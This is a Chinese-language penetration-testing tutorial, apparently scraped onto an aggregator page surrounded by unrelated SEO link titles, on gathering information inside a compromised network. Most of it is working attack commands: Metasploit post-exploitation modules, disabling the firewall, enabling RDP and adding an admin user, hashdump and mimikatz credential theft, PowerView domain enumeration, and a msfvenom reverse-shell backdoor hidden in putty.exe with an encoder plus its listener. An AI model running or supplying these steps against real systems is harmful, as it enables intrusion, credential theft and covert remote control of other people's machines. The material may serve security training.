当前位置: 首页 > news >正文

旅游类网站设计模板下载青岛seo整站优化公司

旅游类网站设计模板下载,青岛seo整站优化公司,个人做网站用哪个主机好,做网站以后的趋势内网信息收集 前言 当我们进行外网信息收集#xff0c;漏洞探测以及漏洞利用后#xff0c;获得了主机的权限后#xff0c;我们需要扩大渗透的战果时#xff0c;这是我们就要进行内网的渗透了#xff0c;内网渗透最重要的还是前期的信息收集的操作了#xff0c;就是我们的… 内网信息收集 前言 当我们进行外网信息收集漏洞探测以及漏洞利用后获得了主机的权限后我们需要扩大渗透的战果时这是我们就要进行内网的渗透了内网渗透最重要的还是前期的信息收集的操作了就是我们的内网信息收集了信息收集需要收集什么内容对后期的横向和纵向移动都有很大的帮助。接下来给大家总结一下内网渗透中的信息收集的模块内容。 msf模块中的信息收集 Msf模块 run post/ run post/windows/gather/ 获取系统的分区情况 forensics取证的模块 run post/windows/gather/forensics/enum_drives 检测是否是虚拟机 run post/windows/gather/checkvm 靶机运行了哪些服务 run post/windows/gather/enum_services 安装了哪些应用 run post/windows/gather/enum_applications 是否有文件共享 run post/windows/gather/enum_shares 最近的操作 run post/windows/gather/dumplinks 安装了哪些补丁 run post/windows/gather/enum_patches 信息收集 scraper是个脚本 run scraper 收集完之后会加载在指定文件 到文件中查看收集内容 cd /root/.msf4/log/scripts/ ls cd scraper/ ls cd 到指定的文件 ls cat zhi.txt 显示乱码的话 chcp 65001 回到正常编码 run winenum 查看系统的路由文件 msf反弹shell后的信息收集 MSF反弹shell chcp 65001(返回的是utf-8的代码) netsh advfirewall set allprofiles state off(关闭防火墙) netsh advfirewall show allprofiles(查看所有配置) shutdown -r -f -t 0(-f 强制重启)立即重启 看看3389端口 打开3389远程桌面 run post/windows/manage/enable_rdp run getgui -e 利用该命令在目标主机上添加用户 run getgui -u admin -p admin (设置密码是) net localgroup adminstrators admin /add 1MSF信息收集 远程桌面连接 windowmstsce kali (rdesktop -u username -p password ip) 获取哈希值 查看远程桌面 screenshot use espia screengrab screenshare 得到哈希值密码破解时权限不够 如何提高权限 pid迁移 getpid ps 查进程找NT SYSTEM的进程pidsvhost pid迁移,migrating pid getuid hashdump 获得哈希值 2凭证信息收集 window密码破解工具 mimikatz 在内存中获取的密码 https://github.com/gentilkiwi/mimikatz/releaseswin10下载网址 在window下使用是需要管理员权限的 图片中是获得明文密码的语句 privilege::debug //提升权限 2.wce wce.exe -w 获取明文密码只适用于win7的低版本 3.pwddump7 得到hash值后可以放到这个网站去进行破解得到明文 https://www.objectif-securite.ch/ophcrack http://www.cmd5.com/Default.aspx 4.procdump免查杀的功能 内网信息收集 先查看是否存在域 查看网段s扫描器 s.exe syn 192.168.0.0 192.168.255.255 80 抓包分析网络流量分析流量看网段meterpreter 抓取目标机所在网络流量 看进程 tasklist netstat -ano netstat -lntplinux systeminfo查看补丁列表 net share net user 查看本机共享列表和课访问的域共享列表 net localgroup admininistrators query user || qwinsta 查看在线用户 route print查看路由 arp -a同一网段的缓存表 关闭防火墙 netsh advfirewall set allprofiles state off03以后 net sh firewall show config查看防火墙配置 netsh可用于端口转发连接内网时用 域环境信息收集 远程登录不安全用msf反弹shell比较安全 whoami /all查看SID域账号用于后面的票据伪造 net user /domain 域中的用户 net time /domain 查看域控 net group “Domain computer” /domain 查看域控制器组 nbtscan扫描同一网段中有哪些主机 net view /domain 查询域 net group “domain computers” /domain 查询所有与成员计算机列表 cls 清屏 net accounts /domain 获取域密码信息 域内管理员信息 net group “domain admins” /domain 查询域管理员用户 msf加载powershell脚本进行信息收集 msf中信息收集工具 在会话中输入run winenum powersploit ls 找到路径 cd Recon 回到会话中 load powershell powershell_import 刚刚的Recon的路径/PowerView.ps1 加载成功 powershell_execute get-NetDomain 查看当前的域有哪些 powershell_execute get-NetUser 当前的用户 powershell_execute get-NetComputer 扫域名 powershell_execute get-NetProcess 进程 扫端口 powershell_import 刚刚的Recon的路径/Invoke-Portscan.ps1 powershell_execute invoke-portscan 192.168.8.1,192.168.8.200 -ports “21,22,80,445,139” empire域渗透内网收集在kali中打开 ./empire 我在kali中给大家演示一下powershell中的powersploit脚本进行信息收集 首先就是在msf中生成一个后门程序shell.exe msfvenom -p windows/meterpreter/reverse_tcp lhost192.168.231.128 lport4444 -x putty.exe -e x86/shikata_ga_nai -f exe -o shell.exe 将shell.exe上传到靶机中点击回连shell在kali中进行监听在kali中打开msf设置参数进行监听 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.231.128 set lport 4444 run 进行一系列设置后我们点击程序发现返回了会话。 我们在kali中打开powersploit找到这这个脚本PowerView.ps1 找到这个路径 /usr/share/windows-resources/powersploit/Recon /usr/share/windows-resources/powersploit/Recon/PowerView.ps1 在回到msf中加载powershell load powershell 导入模块 powershell_import /usr/share/windows-resources/powersploit/Recon//Powerview.ps1 执行脚本 powershell_execute get-NetDomain 我这里由于是用我本机做的实验可能拿到的权限不是很高所以不能做下一步的收集但是对于win7的机器还是可以进行信息收集的 我们进行端口扫描 导入模块 powershell_import /usr/share/windows-resources/powersploit/Recon/Invoke-Portscan.ps1 执行脚本 powershell_execute invoke-portscan 192.168.219.1,192.168.219.200 -ports “21,22,80,445,139” 端口扫描成功了。我们看看另外一个扫描方法吧。 run winenum 这里进行一系列自动化的信息收集,将扫描结果输出到报告中这里显示输出到以下文档中 /root/.msf4/logs/scripts/winenum/LAPTOP-5QFMU9N1_20220920.4003/LAPTOP-5QFMU9N1_20220920.4003.txt 我们进行查看文档 可能还是因为权限的问题只能扫到这么多的信息了但对于其他靶机来说应该会有更全面的扫描结果的。 后记 内网的信息收集就讲解到这了渗透的信息收集至关重要对于后渗透阶段有着举足轻重的作用直接决定着后渗透阶段的战果如何。后面还有内网的代理穿透以及横向移动权限维持痕迹清除等阶段有时间都会给大家总结的噢。 黑客渗透视频教程下方免费领~ 免费领取安全学习资料包私聊进群一起学习共同进步https://docs.qq.com/doc/DRGJHbUxpTWR2Y3lq
http://www.hkea.cn/news/14519366/

相关文章:

  • 设计网站的企业河南响应式官网建设哪里好
  • 扬州中兴建设有限公司网站网站建设人工智能开发
  • 做棋牌推广网站违法不河北邯郸邮政编码
  • 安徽柱石建设有限公司网站ui培训设计
  • 飓风算法受影响的网站有哪些网站建设的种类
  • 尚义网站建设书法网站建站目标
  • 黄埔五屏网站建设凤岗镇网站仿做
  • 邢台地区网站建设口碑好个人物流网站建设方案
  • 163企业邮箱app下载杭州抖音seo
  • 网站空间ip地址查询房地产型网站建设
  • 网站建设 嘉定济南市城市建设规划局官方网站
  • 广州 网站的设计公司网站建设 主机选择
  • 网站开发和运行 法律wap织梦手机网站
  • 京东网站开发费用英文网站cms
  • 网站风格设计的选择打开网站搜索
  • 青海省建设厅职业注册官方网站杭州网络科技设计中心
  • 晋中工商局网站开发区分局金华手机模板建站
  • 企业网站seo外包公司名字大全2022
  • 做网站第一步做什么微信小程序开发费用
  • 网站必须做电子认证吗海报制作软件免费版
  • 淄博公益网站建设如何把网站做成app
  • 家具网站建设公司建设网站需要哪些软硬件条件
  • 有没有发布需求的网站上海发布官网首页
  • 温州建设网站制作网络技术题库
  • 网站自定义功能实现网络基础架构
  • 古镇网站建设公司什么网站做外链优化好
  • 菏泽网站建设电话英文网站seo推广
  • 网站用户黏度wordpress登陆页面模板下载
  • 企业+网站+wordpress做特卖的网站
  • 庆阳网站建设推广成都旅游景点有哪些